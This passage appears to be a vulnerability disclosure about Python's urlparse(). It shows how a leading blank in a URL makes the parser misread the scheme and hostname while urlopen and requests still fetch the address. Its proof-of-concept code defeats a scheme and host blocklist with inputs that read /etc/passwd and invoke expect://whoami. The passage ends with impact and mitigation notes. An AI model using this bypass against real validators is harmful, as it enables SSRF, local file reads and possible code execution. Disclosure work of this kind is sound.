                break
        else:
            scheme, url = url\[:i\].lower(), url\[i+1:\]

    if url\[:2\] == '//':
        netloc, url = \_splitnetloc(url, 2)
        if (('\[' in netloc and '\]' not in netloc) or
                ('\]' in netloc and '\[' not in netloc)):
            raise ValueError("Invalid IPv6 URL")
    if allow\_fragments and '#' in url:
        url, fragment = url.split('#', 1)
    if '?' in url:
        url, query = url.split('?', 1)
    \_checknetloc(netloc)
    v = SplitResult(scheme, netloc, url, query, fragment)
    \_parse\_cache\[key\] = v
    return \_coerce\_result(v)

On line 24, the **\_UNSAFE\_URL\_BYTES\_TO\_REMOVE** list is good for prevent injection.

    for b in _UNSAFE_URL_BYTES_TO_REMOVE:
            url = url.replace(b, "")
            scheme = scheme.replace(b, "")

On line 39, the content of scheme\_chars is below:

    if i > 0:
            for c in url[:i]:
                if c not in scheme_chars:
                    break
            else:
                scheme, url = url[:i].lower(), url[i+1:]

**Since it is a for-else structure, once there is any char not in _scheme\_chars,_ scheme and url will not be assigned by the parsed value.**

Therefore, Scheme will be blank and URL will be the whole string.

Going forward, the condition of _if url\[:2\] == ‘//’:_ will not hold anymore (for normal URL, it will be true because the URL will be assigned as url\[i+1:\] in the previous else clause)

Therefore, netloc and

    if url[:2] == '//':
            netloc, url = _splitnetloc(url, 2)
            if (('[' in netloc and ']' not in netloc) or
                    (']' in netloc and '[' not in netloc)):
                raise ValueError("Invalid IPv6 URL")

Then, on line 54, this is a function to concatenate each component

    v = SplitResult(scheme, netloc, url, query, fragment)

    class SplitResult(_SplitResultBase, _NetlocResultMixinStr):
        __slots__ = ()
        def geturl(self):
            return urlunsplit(self)

    def urlunsplit(components):
        """Combine the elements of a tuple as returned by urlsplit() into a
        complete URL as a string. The data argument can be any five-item iterable.
        This may result in a slightly different, but equivalent URL, if the URL that
        was parsed originally had unnecessary delimiters (for example, a ? with an
        empty query; the RFC states that these are equivalent)."""
        scheme, netloc, url, query, fragment, _coerce_result = (
                                              _coerce_args(*components))
        if netloc or (scheme and scheme in uses_netloc and url[:2] != '//'):
            if url and url[:1] != '/': url = '/' + url
            url = '//' + (netloc or '') + url
        if scheme:
            url = scheme + ':' + url
        if query:
            url = url + '?' + query
        if fragment:
            url = url + '#' + fragment
        return _coerce_result(url)

Since the previous pre-processing are all failed, the whole URL will be regraded as path and other components will be regraded as blank.

As a final result, the parsed result of parsed = urlparse(“\*https://google.com”), will be

abnormal case of urlparse(“\*https://google.com”)

normal case of urlparse(”https://google.com”)

**As an intermediate conclusion, we know that chars not in scheme\_chars will cause urlparse() function to misinterpret results, impacting nearly every field including hostname and scheme.**

However, so far the results is just interesting but not impressive because the URL isn’t really visible.

urllib.request.urlopen("*<https://google.com>") gives us a

_urllib.error.URLError: <urlopen error unknown url type: \*https> error_

After some research, I found **blank** is magic characters helping us to achieve our goal that makes our URL visitable but at same time gives urlparse() a misbehaved result.

For urlopen, the step extracting scheme happening in

    def _splittype(url):
        """splittype('type:opaquestring') --> 'type', 'opaquestring'."""
        global _typeprog
        if _typeprog is None:
            _typeprog = re.compile('([^/:]+):(.*)', re.DOTALL)
    
        match = _typeprog.match(url)
        if match:
            scheme, data = match.groups()
            return scheme.lower(), data
        return None, url

but before entering this step, the URL will be go through

    def full_url(self, url):
            # unwrap('<URL:type://host/path>') --> 'type://host/path'
            self._full_url = unwrap(url)
            self._full_url, self.fragment = _splittag(self._full_url)
            self._parse()

    def unwrap(url):
        """Transform a string like '<URL:scheme://host/path>' into 'scheme://host/path'.
    
        The string is returned unchanged if it's not a wrapped URL.
        """
        url = str(url).strip()
        if url[:1] == '<' and url[-1:] == '>':
            url = url[1:-1].strip()
        if url[:4] == 'URL:':
            url = url[4:].strip()
        return url

the strip function gets rid of the leading blank(s). so that it behave normally.

For request library, there is also a similar function to process URL

    def prepare_url(self, url, params):
            """Prepares the given HTTP URL."""
            #: Accept objects that have string representations.
            #: We're unable to blindly call unicode/str functions
            #: as this will include the bytestring indicator (b'')
            #: on python 3.x.
            #: https://github.com/psf/requests/pull/2238
            if isinstance(url, bytes):
                url = url.decode('utf8')
            else:
                url = unicode(url) if is_py2 else str(url)
    
            # Remove leading whitespaces from url
            url = url.lstrip()

the lstrip function also gets rid of the leading blank(s). so that it behave normally.

Since those are two most prevailing libraries in Python, this vulnerability is already very applicable in many cases and situations.

(NOTE: leading blanks are also valid in current mainstream browsers but It will still fail on urllib3 because there is no similar strip() on it. )

**PoCs**

    import urllib.request
    from urllib.parse import urlparse
    
    def safeURLOpener(inputLink):
        block_schemes = ["file", "gopher", "expect", "php", "dict", "ftp", "glob", "data"]
        block_host = ["instagram.com", "youtube.com", "tiktok.com"]
    
        input_scheme = urlparse(inputLink).scheme
        input_hostname = urlparse(inputLink).hostname
    
        if input_scheme in block_schemes:
            print("input scheme is forbidden")
            return
    
        if input_hostname in block_host:
            print("input hostname is forbidden")
            return
    
        target = urllib.request.urlopen(inputLink)
        content = target.read()
        print(content)
    
    
    def main():
        safeURLOpener(" https://youtube.com")
        safeURLOpener(" file://127.0.0.1/etc/passwd")
        safeURLOpener(" data://text/plain,<?php phpinfo()?>")
        safeURLOpener(" expect://whoami")

**Impact**

I personally think the impact of this vulnerability is huge because this urlparse() library is widely used. Although blocklist is considered an inferior choice, there are many scenarios where blocklist is still needed. This vulnerability would help an attacker to bypass the protections set by the developer for scheme and host. This vulnerability can be expected to help SSRF and RCE in a wide range of scenarios.

Google has accepted my similar report regarding android’s URL parse function and gave a moderate severity since it does affect a number of their own open source project. In the case of Python, I believe the impact may be wider.

**Mitigation**

Community should also add strip() function before processing the URL, thereby eliminating this inconsistency.

Tag

#google